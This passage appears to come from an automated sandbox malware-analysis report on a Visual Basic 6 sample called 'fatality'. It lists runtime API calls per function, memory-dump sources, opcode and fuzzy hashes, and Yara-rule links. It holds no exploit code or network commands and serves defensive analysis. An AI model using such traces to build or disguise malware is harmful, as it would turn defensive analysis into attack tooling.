                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Error$ListSystem$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrCheckCloseConstruct2DestructGenerateHandleHresultOverflowUnicode
                                                                                                                                                            • String ID: D
                                                                                                                                                            • API String ID: 3069481506-2746444292
                                                                                                                                                            • Opcode ID: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                            • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                                                                            • Opcode Fuzzy Hash: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                            • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                                                                                                                            Function 004125A0 Relevance: 54.2, APIs: 36, Instructions: 195COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1066637744-0
                                                                                                                                                            • Opcode ID: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                            • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                                                                            • Opcode Fuzzy Hash: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                            • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                                                                            Function 0040FBA0 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                            • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                            • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                            • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                            • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                            • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                            • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                            • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                            • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                            • String ID: yymmdd
                                                                                                                                                            • API String ID: 2807397001-2871001947
                                                                                                                                                            • Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                                                                            • Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                                                                            Function 0040F8F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                            • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                                                                            • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                            • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                                                                            Function 0040F9A0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1195834276-0
                                                                                                                                                            • Opcode ID: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                            • Instruction ID: 19c458602e53a293f3e6311b0924b7b74753bb6bdf76692d44a87d1e904a729f
                                                                                                                                                            • Opcode Fuzzy Hash: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                            • Instruction Fuzzy Hash: 87019E71A00205AFCB049BB8CD4AA6F7BB8FB48740F50413AF515F32D0D73899058B99
                                                                                                                                                            Function 0040290C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 652 40290c-402932 #100 653 402933-402934 652->653 653->653 654 402936-402942 653->654
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: #100
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1341478452-0
                                                                                                                                                            • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                            • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                                                                                                                            • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                            • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00412C10 Relevance: 684.7, APIs: 386, Strings: 4, Instructions: 2188COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E3F
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E47
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 00412E4B
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000101,?,00000000), ref: 00412E76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412E89
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412E95
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412EAE
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000100,?,00000000), ref: 00412EE7
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412EFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412F06
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412F1F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00412F30
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00412F3C
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000278,?,00000000), ref: 00412F62
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,00000000), ref: 00412F71
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,0000011C,?,00000000), ref: 00412F91
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000084,?,00000000), ref: 00412FDC
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,0000008C,?,00000000), ref: 00413024
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000154,?,00000000), ref: 00413049
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,00000050,?,00000000), ref: 0041306D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,6CEBD83C,004074A0,000000E0,?,00000000), ref: 004130A3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 004130C9
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000264,?,00000000), ref: 004130FE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00413110
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00413138
